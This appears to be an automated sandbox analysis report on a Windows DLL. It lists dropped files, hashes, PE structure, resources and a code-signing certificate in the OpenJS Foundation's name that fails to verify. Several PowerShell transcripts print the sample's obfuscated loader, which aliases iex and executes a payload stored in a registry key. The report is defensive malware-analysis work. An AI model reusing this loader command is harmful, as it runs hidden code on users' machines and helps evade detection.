                        SHA-512:87CA675464DED2449A4BC6AD61202FA04F00D1AF173D1BF3E471CC5413A85C204EA967C27177FC37A4E80B7E5E31258FA41C0081FF35638F42CC28429D3AC532
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.348694375232745
                        Encrypted:false
                        SSDEEP:12:xKIR37Lvkmb6KzMWZE2sKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6Kz9E2sKaM5DqBVKVrdFAMBJTH
                        MD5:D86ACBAA58E203B2849D410C07220578
                        SHA1:22F3A10EF4FB73B6A76D6FA4C6DCC7D8E6842A83
                        SHA-256:9FEC93CFFFF08573DED5958B966582FAC2EB57E68469BF94850C73385625AB86
                        SHA-512:4C56050C5B07C3C13FEFCF808D5E9B28BDC724255406C6A01167949E7E036623E544F32E2B6C16526B4A02BFB52F3DD887F5F362AB856BB5679834C87A68524B
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.6dNuCqGT.20211214103418.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1359
                        Entropy (8bit):5.406002359282101
                        Encrypted:false
                        SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWUHjeTKKjX4CIym1ZJXXB/pLCHm4StnxSAZ7t:BZP/v//oOHKm4GUqDYB1Z9B/Km4SRZZR
                        MD5:51B9F4D065CD36EEB47C62B81AFB7F06
                        SHA1:BCFD8E1BD2F58F4F3F3150F672857CF45E23BC2A
                        SHA-256:FAF75023385D35770B9D01F760C1876E1E25445A6D9C839CDAE71091453519F8
                        SHA-512:2BC504F6988648C5FA1DEF96CA3B22A0CC01AD926334F4FB0271D0FA324304F00CF6FBEE76A575C72EFF27D6C4C45BC19DB97E463E175CC38B6793219BD020E6
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7012..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.DMr5Wv1u.20211214103418.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1359
                        Entropy (8bit):5.403706904252732
                        Encrypted:false
                        SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWiHjeTKKjX4CIym1ZJXXJpLCHm4StOnxSAZ7iq:BZP/v//oOHKm4GiqDYB1Z9JKm4SaZZ7d
                        MD5:7291ABA011A1193C203450F5D3512461
                        SHA1:310F781764BB9AC8A8D3B7F14E38AD05EE18730C
                        SHA-256:0FA2BD16F02EEC7CA811D01D14782EC171D0A7E6AC1C4439C87B2E6A0C6536C4
                        SHA-512:C2BAB621C1E45A10BEC063ED6F84F63BD94D8533B83FC22A552BA35791A25B0254CF95F3341DC46CE4C6ED63D9698E2114A4A17D3F25BC38B6305B5A257955D9
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103420..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103420..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.ZSxBE1Sk.20211214103425.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1146
                        Entropy (8bit):5.544628786712
                        Encrypted:false
                        SSDEEP:24:BxSAPJDvBB/x2DOXUWnpLCHm4XW/HjeTKKjX4CIym1ZJXX7pLCHm4v:BZPhv//oOHKm4G/qDYB1Z97Km4v
                        MD5:E0C308808C66AB01D5B3EF7C3856B1D5
                        SHA1:13F36AB3AAEA583989B9C72E15A29F8F49EC8B2A
                        SHA-256:EA41567677F8A22C46060C26ACB8AE2B68B789283782A6096F264A4DBF25468D
                        SHA-512:3EF71D741446DA480EEA5ECDDF428571059A11C2516C8287FA5A891426E1014D9C41649F5D1912D748379F93468DD1C7EB8A9AC14CCD3FFEFBF292E3C707EE4E
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 3532..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103426..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1146
                        Entropy (8bit):5.542879881063877
                        Encrypted:false
                        SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWnHjeTKKjX4CIym1ZJXXB/pLCHm4v:BZP/v//oOHKm4GnqDYB1Z9B/Km4v
                        MD5:635442A47792E7CA6AB6C67E60181544
                        SHA1:1476DE8E879BA1B92742F3F951AECE56DE2A882A
                        SHA-256:C9026B19F44A3E5A20EA9A2F355703C5BC988246CC98D0EE2228333766324050
                        SHA-512:6621F0DB6601D61F5736EB95425F4590ADB546FA422ACC627F4A26544387BA9F274D9A5B13E54DA30228EEBD8EB4DE76CE125A435080D46A6FC5A502FAF2646F
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7132..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq

                        Static File Info

                        General

                        File type:MS-DOS executable, MZ for MS-DOS
                        Entropy (8bit):5.270863171013114
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • VXD Driver (31/22) 0.00%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:6.dll
                        File size:1781920
                        MD5:ac57d694b86d8532b38d3d62f6de3afc
                        SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
                        SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
                        SHA512:cd9635d667a43c0d6715ec05c114c424b3f1292d7997c8d6c86f937ff81a08262763d33621c7d75d3c2a5fac75b58c71489fe3360fd4a2d6c804e7a72a06683b
                        SSDEEP:49152:JOMo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8Mc:xo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8Z
                        File Content Preview:MZ......................................................................!..L.!This .ro.ra. cannot be run in DOS m.de....$.......PE..L...[..a...........!....................................................................................................V..

                        File Icon

                        Icon Hash: 82b0f4c6d2c66cb1

                        Static PE Info

                        General

                        Entrypoint: 0x1001f3fe
                        Entrypoint Section: .text
                        Digitally signed: true
                        Imagebase: 0x10000000
                        Subsystem: windows gui
                        Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        DLL Characteristics:
                        Time Stamp: 0x61B6D25B [Mon Dec 13 04:55:55 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major: 4
                        OS Version Minor: 0
                        File Version Major: 4
                        File Version Minor: 0
                        Subsystem Version Major: 4
                        Subsystem Version Minor: 0
                        Import Hash: 90a569c76737ac6eae14ae164dabea89

                        Authenticode Signature

                        Signature Valid: false
                        Signature Issuer: CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                        Signature Validation Error: The digital signature of the object did not verify
                        Error Number: -2146869232
                        Not Before, Not After:
                        • 10/1/2020 5:00:00 PM, 12/18/2023 4:00:00 AM
                        Subject Chain:
                        • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                        Version: 3
                        Thumbprint MD5: 8E8056A2284F0304445ED325353454BF
                        Thumbprint SHA-1: E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                        Thumbprint SHA-256: 968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                        Serial: 038EDB2FC6E405731A760F1516144C85

                        Entrypoint Preview

                        Instruction
                        mov ebx, edi
                        or ebx, edi
                        jmp 00007FD68CC158E2h
                        ret
                        ret
                        pop ecx
                        push esi
                        pop ebx
                        ret
                        mov edi, dword ptr [1000335Ch]
                        call 00007FD68CC147C8h
                        mov esp, dword ptr [ebp-18h]
                        mov word ptr [100030FCh], es
                        mov ecx, dword ptr [ebp-04h]
                        lea ebp, dword ptr [esp+10h]
                        int3
                        int3
                        push ebp
                        push edi
                        mov dword ptr [10003120h], eax
                        push eax
                        je 00007FD68CC144B6h
                        int3
                        mov dword ptr fs:[00000000h], ecx
                        mov eax, dword ptr [ebp+0Ch]
                        mov ecx, edi
                        push eax
                        jmp dword ptr [100040BCh]
                        add ecx, eax
                        mov eax, dword ptr [ecx]
                        cmp edi, ecx
                        mov eax, dword ptr [ecx]
                        push 10000000h
                        mov eax, dword ptr [ebp-14h]
                        push 00000000h
                        push 1001E268h
                        ret
                        xor esi, esi
                        xor esi, esi
                        xor esi, esi
                        pop eax
                        int3
                        int3
                        int3
                        mov esp, dword ptr [ebp-18h]
                        int3
                        jmp dword ptr [10004078h]
                        pop ebx
                        sete cl
                        call 00007FD68CC14373h
                        int3
                        mov ecx, edi
                        ret
                        jmp dword ptr [1000406Ch]
                        ret
                        call 00007FD68CC1407Ch
                        int3
                        int3
                        mov word ptr [100030F8h], fs
                        cmp dword ptr [10003010h], 00000000h
                        int3
                        int3
                        int3
                        call 00007FD68CC1453Fh
                        int3
                        int3
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        int3
                        sub al, cl
                        jmp 00007FD68CC170D8h
                        int3
                        int3
                        int3
                        push eax
                        mov dword ptr [ebp-04h], eax
                        int3
                        cmp dword ptr [00000000h], 00000000h

                        Data Directories

                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1cff0 | 0x56 | .text
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x43d04 | 0xb4 | .data
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x16f8e8 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1b1800 | 0x18a0 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b7000 | 0x6ec | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x28d06 | 0x27c | .data
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x26ec0 | 0x24800 | False | 0.516815603596 | data | 5.50396706074 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .data | 0x28000 | 0x1e4fe | 0x1be00 | False | 0.057858043722 | data | 6.06796420192 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x47000 | 0x16f8e8 | 0x16fa00 | False | 0.218529518021 | data | 4.81717219526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0x1b7000 | 0x6ec | 0x800 | False | 0.75 | data | 6.07315256741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        Name | RVA | Size | Type | Language | Country
                        RT_ICON | 0x4af70 | 0x668 | data | English | United States
                        RT_ICON | 0x4b5d8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x4b8c0 | 0x1e8 | data | English | United States
                        RT_ICON | 0x4baa8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x4bbd0 | 0xea8 | data | English | United States
                        RT_ICON | 0x4ca78 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x4d320 | 0x6c8 | data | English | United States
                        RT_ICON | 0x4d9e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x4df50 | 0x25a8 | data | English | United States
                        RT_ICON | 0x504f8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x515a0 | 0x988 | data | English | United States
                        RT_ICON | 0x51f28 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x52390 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
                        RT_ICON | 0x647b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
                        RT_ICON | 0x693e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
                        RT_ICON | 0x6d608 | 0x25a8 | data | English | United States
                        RT_ICON | 0x6fbb0 | 0x10a8 | data | English | United States
                        RT_ICON | 0x70c58 | 0xeb0 | data | English | United States
                        RT_ICON | 0x71b08 | 0x988 | data | English | United States
                        RT_ICON | 0x72490 | 0x6b8 | data | English | United States
                        RT_ICON | 0x72b48 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x72fb0 | 0x668 | data | English | United States
                        RT_ICON | 0x73618 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x73900 | 0x1e8 | data | English | United States
                        RT_ICON | 0x73ae8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x73c10 | 0xea8 | data | English | United States
                        RT_ICON | 0x74ab8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x75360 | 0x6c8 | data | English | United States
                        RT_ICON | 0x75a28 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x75f90 | 0x25a8 | data | English | United States
                        RT_ICON | 0x78538 | 0x10a8 | data | English | United States
                        RT_ICON | 0x795e0 | 0x988 | data | English | United States
                        RT_ICON | 0x79f68 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x7a3d0 | 0x668 | data | English | United States
                        RT_ICON | 0x7aa38 | 0x2e8 | data | English | United States
                        RT_ICON | 0x7ad20 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x7ae48 | 0xea8 | data | English | United States
                        RT_ICON | 0x7bcf0 | 0x8a8 | data | English | United States
                        RT_ICON | 0x7c598 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x7cb00 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0x81030 | 0x25a8 | data | English | United States
                        RT_ICON | 0x835d8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x84680 | 0x988 | data | English | United States
                        RT_ICON | 0x85008 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x85470 | 0x668 | data | English | United States
                        RT_ICON | 0x85ad8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x85dc0 | 0x1e8 | data | English | United States
                        RT_ICON | 0x85fa8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x860d0 | 0xea8 | data | English | United States
                        RT_ICON | 0x86f78 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x87820 | 0x6c8 | data | English | United States
                        RT_ICON | 0x87ee8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x88450 | 0x25a8 | data | English | United States
                        RT_ICON | 0x8a9f8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x8baa0 | 0x988 | data | English | United States
                        RT_ICON | 0x8c428 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x8c890 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
                        RT_ICON | 0x9ecb8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
                        RT_ICON | 0xa38e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
                        RT_ICON | 0xa7b08 | 0x25a8 | data | English | United States
                        RT_ICON | 0xaa0b0 | 0x10a8 | data | English | United States
                        RT_ICON | 0xab158 | 0xeb0 | data | English | United States
                        RT_ICON | 0xac008 | 0x988 | data | English | United States
                        RT_ICON | 0xac990 | 0x6b8 | data | English | United States
                        RT_ICON | 0xad048 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xad4b0 | 0x668 | data | English | United States
                        RT_ICON | 0xadb18 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0xade00 | 0x1e8 | data | English | United States
                        RT_ICON | 0xadfe8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xae110 | 0xea8 | data | English | United States
                        RT_ICON | 0xaefb8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0xaf860 | 0x6c8 | data | English | United States
                        RT_ICON | 0xaff28 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xb0490 | 0x25a8 | data | English | United States
                        RT_ICON | 0xb2a38 | 0x10a8 | data | English | United States
                        RT_ICON | 0xb3ae0 | 0x988 | data | English | United States
                        RT_ICON | 0xb4468 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xb48d0 | 0x668 | data | English | United States
                        RT_ICON | 0xb4f38 | 0x2e8 | data | English | United States
                        RT_ICON | 0xb5220 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xb5348 | 0xea8 | data | English | United States
                        RT_ICON | 0xb61f0 | 0x8a8 | data | English | United States
                        RT_ICON | 0xb6a98 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xb7000 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0xbb530 | 0x25a8 | data | English | United States
                        RT_ICON | 0xbdad8 | 0x10a8 | data | English | United States
                        RT_ICON | 0xbeb80 | 0x988 | data | English | United States
                        RT_ICON | 0xbf508 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xbf970 | 0x668 | data | English | United States
                        RT_ICON | 0xbffd8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0xc02c0 | 0x1e8 | data | English | United States
                        RT_ICON | 0xc04a8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xc05d0 | 0xea8 | data | English | United States
                        RT_ICON | 0xc1478 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0xc1d20 | 0x6c8 | data | English | United States
                        RT_ICON | 0xc23e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xc2950 | 0x25a8 | data | English | United States
                        RT_ICON | 0xc4ef8 | 0x10a8 | data | English | United States
                        RT_ICON | 0xc5fa0 | 0x988 | data | English | United States
                        RT_ICON | 0xc6928 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xc6d90 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
                        RT_ICON | 0xd91b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
                        RT_ICON | 0xddde0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
                        RT_ICON | 0xe2008 | 0x25a8 | data | English | United States
                        RT_ICON | 0xe45b0 | 0x10a8 | data | English | United States
                        RT_ICON | 0xe5658 | 0xeb0 | data | English | United States
                        RT_ICON | 0xe6508 | 0x988 | data | English | United States
                        RT_ICON | 0xe6e90 | 0x6b8 | data | English | United States
                        RT_ICON | 0xe7548 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xe79b0 | 0x668 | data | English | United States
                        RT_ICON | 0xe8018 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0xe8300 | 0x1e8 | data | English | United States
                        RT_ICON | 0xe84e8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xe8610 | 0xea8 | data | English | United States
                        RT_ICON | 0xe94b8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0xe9d60 | 0x6c8 | data | English | United States
                        RT_ICON | 0xea428 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xea990 | 0x25a8 | data | English | United States
                        RT_ICON | 0xecf38 | 0x10a8 | data | English | United States
                        RT_ICON | 0xedfe0 | 0x988 | data | English | United States
                        RT_ICON | 0xee968 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xeedd0 | 0x668 | data | English | United States
                        RT_ICON | 0xef438 | 0x2e8 | data | English | United States
                        RT_ICON | 0xef720 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xef848 | 0xea8 | data | English | United States
                        RT_ICON | 0xf06f0 | 0x8a8 | data | English | United States
                        RT_ICON | 0xf0f98 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xf1500 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0xf5a30 | 0x25a8 | data | English | United States
                        RT_ICON | 0xf7fd8 | 0x10a8 | data | English | United States
                        RT_ICON | 0xf9080 | 0x988 | data | English | United States
                        RT_ICON | 0xf9a08 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xf9e70 | 0x668 | data | English | United States
                        RT_ICON | 0xfa4d8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0xfa7c0 | 0x1e8 | data | English | United States
                        RT_ICON | 0xfa9a8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xfaad0 | 0xea8 | data | English | United States
                        RT_ICON | 0xfb978 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0xfc220 | 0x6c8 | data | English | United States
                        RT_ICON | 0xfc8e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0xfce50 | 0x25a8 | data | English | United States
                        RT_ICON | 0xff3f8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x1004a0 | 0x988 | data | English | United States
                        RT_ICON | 0x100e28 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x101290 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
